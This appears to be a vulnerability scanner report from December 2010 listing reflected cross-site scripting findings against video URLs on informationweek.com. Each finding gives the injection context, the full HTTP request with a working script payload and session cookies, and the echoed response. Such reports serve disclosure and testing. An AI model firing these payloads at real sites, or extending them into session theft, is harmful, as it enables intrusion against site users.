The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1772f'-alert(1)-'998ddc2136e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video1772f'-alert(1)-'998ddc2136e/security/44865844001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:53 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:53 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30697
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video1772f'-alert(1)-'998ddc2136e/security/44865844001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=181081857;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 772ec"><x%20style%3dx%3aexpression(alert(1))>35d6f7ef7e3 was submitted in the REST URL parameter 1. This input was echoed as 772ec"><x style=x:expression(alert(1))>35d6f7ef7e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /video772ec"><x%20style%3dx%3aexpression(alert(1))>35d6f7ef7e3/security/44865844001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:51 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:51 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30835
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video772ec"><x style=x:expression(alert(1))>35d6f7ef7e3/se;kvarticleid=;kvauthor=;loc=300;grp=464449422" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4106b"><script>alert(1)</script>0f726ca262d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/security4106b"><script>alert(1)</script>0f726ca262d/44865844001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:00 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:00 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97734
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=security+/video/security4106b"><script>alert(1)</script>0f726ca262d/;kvarticleid=;kvauthor=;loc=300;grp=874214663" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ecdc</script><a%20b%3dc>3b4bf73d484 was submitted in the REST URL parameter 2. This input was echoed as 7ecdc</script><a b=c>3b4bf73d484 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security7ecdc</script><a%20b%3dc>3b4bf73d484/44865844001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:12 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:12 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97600
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=security+/video/security7ecdc</script><a b=c>3b4bf73d484/44865844001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=405952968;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 354f4</script>7ba69ba86af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/354f4</script>7ba69ba86af/68506465001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:35 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:35 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 93129
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/video/354f4</script>7ba69ba86af/68506465001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=440742095;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78039"a%3d"b"c93b787164 was submitted in the REST URL parameter 2. This input was echoed as 78039"a="b"c93b787164 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/78039"a%3d"b"c93b787164/68506465001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:26 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:26 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 93195
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/video/78039"a="b"c93b787164/68506465001;kvarticleid=;kvauthor=;loc=300;grp=291681842" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6880'-alert(1)-'5ca39d54f81 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security/68506465001a6880'-alert(1)-'5ca39d54f81 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:47 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:47 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30661
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... cr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/68506465001a6880'-alert(1)-'5ca39d54f81;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=150464374;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fb9f"%20a%3db%2086febf3773e was submitted in the REST URL parameter 3. This input was echoed as 2fb9f" a=b 86febf3773e in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/security/685064650012fb9f"%20a%3db%2086febf3773e HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:43 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:43 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30621
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/685064650012fb9f" a=b 86febf3773e;kvarticleid=;kvauthor=;loc=300;grp=995365297" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ab6a'-alert(1)-'2bc30409ae0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video9ab6a'-alert(1)-'2bc30409ae0/security/68553969001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:29 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:29 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30697
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video9ab6a'-alert(1)-'2bc30409ae0/security/68553969001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=296498865;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4ae0"><img%20src%3da%20onerror%3dalert(1)>3a38e5627f3 was submitted in the REST URL parameter 1. This input was echoed as d4ae0"><img src=a onerror=alert(1)>3a38e5627f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /videod4ae0"><img%20src%3da%20onerror%3dalert(1)>3a38e5627f3/security/68553969001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:27 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:27 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30823
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/videod4ae0"><img src=a onerror=alert(1)>3a38e5627f3/securi;kvarticleid=;kvauthor=;loc=300;grp=814940346" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91284'-alert(1)-'c844e048bdd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security/6855396900191284'-alert(1)-'c844e048bdd HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:53 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:53 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30661
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... cr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/6855396900191284'-alert(1)-'c844e048bdd;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=993072127;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81e58"><a%20b%3dc>f89a250db91 was submitted in the REST URL parameter 3. This input was echoed as 81e58"><a b=c>f89a250db91 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/security/6855396900181e58"><a%20b%3dc>f89a250db91 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:48 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:48 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30657
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/6855396900181e58"><a b=c>f89a250db91;kvarticleid=;kvauthor=;loc=300;grp=482117926" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff0a5'-alert(1)-'a7b46b4249c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ff0a5'-alert(1)-'a7b46b4249c/security/81784308001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:33 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:33 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30610
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/ff0a5'-alert(1)-'a7b46b4249c/security/81784308001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=85041737;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9058"style%3d"x%3aexpression(alert(1))"68d553d6f34 was submitted in the REST URL parameter 1. This input was echoed as f9058"style="x:expression(alert(1))"68d553d6f34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /f9058"style%3d"x%3aexpression(alert(1))"68d553d6f34/security/81784308001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:31 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:31 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30807
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/f9058"style="x:expression(alert(1))"68d553d6f34/security/8;kvarticleid=;kvauthor=;loc=300;grp=564284099" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45130'-alert(1)-'8c5e548a91a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
